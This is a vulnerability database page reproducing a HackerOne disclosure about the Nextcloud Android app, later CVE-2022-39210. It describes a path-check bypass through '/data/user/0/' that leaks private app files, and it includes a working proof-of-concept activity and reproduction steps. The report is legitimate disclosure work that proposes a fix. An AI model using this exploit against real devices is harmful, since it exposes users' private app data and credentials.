Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneLuchuaH1:1408692
HistoryNov 23, 2021 - 11:44 p.m.

Nextcloud: Access to arbitrary file of the Nextcloud Android app from within the Nextcloud Android app

2021-11-2323:44:09
luchua
hackerone.com
$250
17
arbitrary file leak
nextcloud android
security patch

EPSS

0

Percentile

9.9%

JSON

Summary:

The Android client of nextcloud (com.nextcloud.client) allows arbitrary file including protected/private files to be leaked through the file upload functionality.

Steps To Reproduce:

A report 1142918 has been submitted for the vulnerability of leaking arbitrary protected files. NextCloud added a fix on May 18, 2021, which added a check to the class src/main/java/com/owncloud/android/files/services/FileUploader.java:

        if (file.getStoragePath().startsWith("/data/data/")) {
            Log_OC.d(TAG, "Upload from sensitive path is not allowed");
            return;
        }

The fix checks whether a file to be uploaded has a path starting with “/data/data”. However, the check is not sufficient. We can easily bypass this check using the path “/data/user/0/” e.g. “/data/user/0/com.nextcloud.client/”. A program to exploit this vulnerability can be:

public class EvilActivity extends AppCompatActivity {
    private static final String LOG_TAG = EvilActivity.class.getName();

    final static String PRIVATE_URI = "file:///data/user/0/com.nextcloud.client/shared_prefs/com.nextcloud.client_preferences.xml";

    @Override
    protected void onCreate(@Nullable Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        Log.d("heen", "EvilActivity started!");
        setResult(-1, new Intent().setData(Uri.parse(PRIVATE_URI)));
        finish();
    }
}

A working POC is as follows:

1. install and login nextcloud android client e.g. through the provider https://us.cloudamo.com

2. create a directory and set it ‘shareable’

3.install the POC app with the program above

4. Navigate to the shareable directory in the step2, click ‘+’, then choose “upload content from other apps”

5. Select “poc” then protected file will be uploaded to the shared folder, which is publicly shared and leaked.

Supporting Material/References:

A sample screenshot with protected files uploaded and their content is:
{F1523976}
{F1523979}

  • [attachment / reference]
    See attachments above

Impact

Arbitrary sensitive file of the nextcloud android client can be leaked. To address this issue, disallow any file whose path has the package name but isn’t in the temp or cache folder of nextcloud.

Please investigate. Thanks.

Related

cve 1
cvelist 1
nextcloud 1
prion 1
nvd 1
osv 1
cve
cve
CVE-2022-39210
2022-09-17 00:15:09
cvelist
cvelist
CVE-2022-39210 Access to internal files of the Nextcloud Android app
2022-09-16 23:10:15
nextcloud
nextcloud
Access to internal files of the Nextcloud Android app from within the Nextcloud Android app
2022-09-16 04:49:50
prion
prion
Design/Logic Flaw
2022-09-17 00:15:00
nvd
nvd
CVE-2022-39210
2022-09-17 00:15:09
osv
osv
CVE-2022-39210
2022-09-17 00:15:09

EPSS

0

Percentile

9.9%

JSON
Related for H1:1408692
cve1cvelist1nextcloud1prion1nvd1osv1